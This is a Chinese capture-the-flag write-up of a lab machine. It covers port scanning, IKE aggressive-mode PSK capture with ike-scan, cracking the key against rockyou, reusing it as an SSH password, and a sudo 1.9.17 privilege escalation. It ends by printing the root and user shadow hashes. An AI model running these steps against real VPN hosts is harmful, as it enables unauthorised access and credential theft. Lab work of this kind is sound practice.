基本信息

端口扫描

tcp只有22:

1
2
3
4
5
6
7
8
9
10
11
$ nmap -sC -sV -Pn 10.10.11.87
Starting Nmap 7.95 ( https://nmap.org ) at 2025-09-26 13:53 JST
Nmap scan report for 10.10.11.87
Host is up (0.18s latency).
Not shown: 999 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 10.0p2 Debian 8 (protocol 2.0)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 51.61 seconds

所以还需要udp扫描,有个500端口:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
$ sudo nmap -sC -sV -sU -p 500 10.10.11.87
Starting Nmap 7.95 ( https://nmap.org ) at 2025-09-26 14:29 JST
Nmap scan report for 10.10.11.87
Host is up (0.42s latency).

PORT    STATE SERVICE VERSION
500/udp open  isakmp?
| ike-version:
|   attributes:
|     XAUTH
|_    Dead Peer Detection v1.0

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 140.36 seconds

ISAKMP

udp 500端口(这台机器的badge上也显示着500)是ISAKMP的 VPN/密钥交换服务,找到一个专用工具:

首先扫描获取预共享密钥 PSK,结果中也可以知道用户名就是ike:

1
sudo ike-scan -A -P 10.10.11.87

然后破解psk得到key:

1
2
3
sudo psk-crack psk.txt -d /usr/share/wordlists/rockyou.txt

freakingrockstarontheroad

user flag

得到的密码就是ike用户ssh密码:

提权信息

常规linpeas之类枚举发现,sudo版本1.9.17,存在已知漏洞:

提权 & root flag

exp一键:

shadow

1
2
root:$y$j9T$u0cgimzO/m87OQdCkETl10$mTZSmVXBn10OJT7qVqvlEr7OwC0QppltyX33WH1esn7:20229:0:99999:7:::
ike:$y$j9T$iACv1qBHXsR1j0yqIsVwY.$udBwggnZtUPt/0TNMIhsU4TDrQm2tCzTr6xUE0ilPQ4:20292:0:99999:7:::

参考资料